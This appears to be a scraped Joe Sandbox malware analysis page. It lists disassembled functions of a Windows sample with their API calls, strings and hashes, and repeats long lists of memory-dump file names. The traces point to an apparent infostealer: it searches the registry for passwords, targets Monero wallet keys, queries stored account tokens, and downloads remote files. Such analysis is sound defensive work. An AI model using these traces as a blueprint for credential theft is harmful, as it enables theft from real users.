Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: 91de8aadf57e165b18374113d9d56c918b6dfb271d85acf118c30467a8706e71
Instruction ID: 892fd22ce0204c1d3eb81c045f6bf900d66246a54761c83e2d757849f1ad0834
Opcode Fuzzy Hash: 91de8aadf57e165b18374113d9d56c918b6dfb271d85acf118c30467a8706e71
Instruction Fuzzy Hash: 9741B1B1D04648ABDB11DF94DC85BEEBBB8EF18700F104198F549A72C0DBB5AA44CFA5

Function 00108100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00CDE238,00000000,?,00110E2C,00000000,?,00000000), ref: 00108130
RtlAllocateHeap.NTDLL(00000000), ref: 00108137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00108158
__aulldiv.LIBCMT ref: 00108172
__aulldiv.LIBCMT ref: 00108180
wsprintfA.USER32 ref: 001081AC

Strings

@, xrefs: 0010814D
%d MB, xrefs: 001081A3

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: 36e02abfb84edbeb83c74ca8da0cd09af588601a6b598b4c6610671498d6d52f
Instruction ID: 3d421fe66d4185184911ecc51a8cac5b22bb31a15121f22647699640e0f0d140
Opcode Fuzzy Hash: 36e02abfb84edbeb83c74ca8da0cd09af588601a6b598b4c6610671498d6d52f
Instruction Fuzzy Hash: 1C211DB1E44618ABDB04DFD4DC49FAEBBB8FB44B10F104619F645BB2C0D7B859018BA5

Function 000F60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

Part of subcall function 000F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 000F4839
Part of subcall function 000F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 000F4849

InternetOpenA.WININET(00110DF7,00000001,00000000,00000000,00000000), ref: 000F610F
StrCmpCA.SHLWAPI(?,00CDE928), ref: 000F6147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 000F618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 000F61B3
InternetReadFile.WININET(?,?,00000400,?), ref: 000F61DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 000F620A
CloseHandle.KERNEL32(?,?,00000400), ref: 000F6249
InternetCloseHandle.WININET(?), ref: 000F6253
InternetCloseHandle.WININET(00000000), ref: 000F6260

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: e2d129472727b53dde29646e3c821de05e5846e1a34ca5379ec3827745dae544
Instruction ID: 6bd06019963febf9b718bfe2cbff80290aeffac3711ca19185107c5f5ad78178
Opcode Fuzzy Hash: e2d129472727b53dde29646e3c821de05e5846e1a34ca5379ec3827745dae544
Instruction Fuzzy Hash: 4D516DB1A0060CABDB60DFA0DC89BEE77B8FB44701F108098B645A71C1DBB56A85DF95

Function 000F72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 000F733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000F73B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 000F740D
GetProcessHeap.KERNEL32(00000000,?), ref: 000F7452
HeapFree.KERNEL32(00000000), ref: 000F7459
task.LIBCPMTD ref: 000F7555

Strings

Password, xrefs: 000F7401

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 72fc7f0cca00abcf440683f722147438ab43a8074b9774e4ae2e2af68398b854
Instruction ID: cd5ce3652ff2fa0d9354eb261f12aa1ab06122950848cc6ca233d5f401189280
Opcode Fuzzy Hash: 72fc7f0cca00abcf440683f722147438ab43a8074b9774e4ae2e2af68398b854
Instruction Fuzzy Hash: 08612DB590416C9BDB24DF50DC41BE9B7B8BF44300F0081E9E689A6581DFB06BC9DF91

Function 000FBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0010A740: lstrcpy.KERNEL32(00110E17,00000000), ref: 0010A788

Part of subcall function 0010A9B0: lstrlen.KERNEL32(?,00CD90F0,?,\Monero\wallet.keys,00110E17), ref: 0010A9C5
Part of subcall function 0010A9B0: lstrcpy.KERNEL32(00000000), ref: 0010AA04
Part of subcall function 0010A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0010AA12

Part of subcall function 0010A920: lstrcpy.KERNEL32(00000000,?), ref: 0010A972
Part of subcall function 0010A920: lstrcat.KERNEL32(00000000), ref: 0010A982

Part of subcall function 0010A8A0: lstrcpy.KERNEL32(?,00110E17), ref: 0010A905

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

lstrlen.KERNEL32(00000000), ref: 000FBC9F

Part of subcall function 00108E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00108E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 000FBCCD
lstrlen.KERNEL32(00000000), ref: 000FBDA5
lstrlen.KERNEL32(00000000), ref: 000FBDB9

Strings

AccountTokens, xrefs: 000FBABA
SELECT service, encrypted_token FROM token_service, xrefs: 000FBBEB
AccountTokens, xrefs: 000FBB49
AccountId, xrefs: 000FBCC4

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: 8fdb5e8ea876c2095b8b6ce96accc4dbd5a1d5f02810743e43390322cdf27e5c
Instruction ID: 76b55638e19dd4a088daf4d08ed0733aa5ce06d85634aa93d3d5a348b4a85e2c
Opcode Fuzzy Hash: 8fdb5e8ea876c2095b8b6ce96accc4dbd5a1d5f02810743e43390322cdf27e5c
Instruction Fuzzy Hash: 3DB125719102089BDB04FBA0DD96EEE737CAF64301F804569F586A70D1EF746A49CBA2

Function 000F4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000F4FCA
RtlAllocateHeap.NTDLL(00000000), ref: 000F4FD1
InternetOpenA.WININET(00110DDF,00000000,00000000,00000000,00000000), ref: 000F4FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 000F5011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 000F5041
InternetCloseHandle.WININET(?), ref: 000F50B9
InternetCloseHandle.WININET(?), ref: 000F50C6

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: e410024790e7386ef11390deabac16d67ed9b6009549f79c269fed0a709ff384
Instruction ID: b2713e3c7ef43879f9cbbe02e2bda6bf142a1e6913044dc33e96af892e4b5859
Opcode Fuzzy Hash: e410024790e7386ef11390deabac16d67ed9b6009549f79c269fed0a709ff384
Instruction Fuzzy Hash: 4C31F8B4A4021CABDB20CF94DC85BDDB7B8EB48705F5081D9F709A7281DB706AC58F99

Function 001083DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00108426
wsprintfA.USER32 ref: 00108459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0010847B
RegCloseKey.ADVAPI32(00000000), ref: 0010848C
RegCloseKey.ADVAPI32(00000000), ref: 00108499

Part of subcall function 0010A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0010A7E6

RegQueryValueExA.KERNEL32(00000000,00CDE1D8,00000000,000F003F,?,00000400), ref: 001084EC
lstrlen.KERNEL32(?), ref: 00108501
RegQueryValueExA.KERNEL32(00000000,00CDE190,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00110B34), ref: 00108599
RegCloseKey.KERNEL32(00000000), ref: 00108608
RegCloseKey.ADVAPI32(00000000), ref: 0010861A

Strings

%s\%s, xrefs: 0010844D

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000020E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000295000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000033A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005A9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938462531.00000000005E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938740475.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938853817.000000000077C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938871279.000000000077D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: ab75ef0a6e82715a06f72c1208109503e70bde581a8899f8012143644cd3eb0b
Instruction ID: b57e1b2661dceff5394ed831ae1c52ab0315548c13e30c6c528a2729c1cd6841
Opcode Fuzzy Hash: ab75ef0a6e82715a06f72c1208109503e70bde581a8899f8012143644cd3eb0b
Instruction Fuzzy Hash: 4A212A7190021CABDB24DB54DC85FE9B7B8FB48700F00C5D8E689A6280DFB16A85CFD4

Function 00107690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 001076A4
RtlAllocateHeap.NTDLL(00000000), ref: 001076AB
RegOpenKeyExA.KERNEL32(80000002,00CCC2A0,00000000,00020119,00000000), ref: 001076DD
RegQueryValueExA.KERNEL32(00000000,00CDE3D0,00000000,00000000,?,000000FF), ref: 001076FE
RegCloseKey.ADVAPI32(00000000), ref: 00107708

Strings

Windows 11, xrefs: 001076BD

Memory Dump Source

Source File: 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1938022160.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000175000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000178000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.000000000017F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1938047002.00000000001A1000.00000040.00000001.01000000.00000003.sdmpDownload File
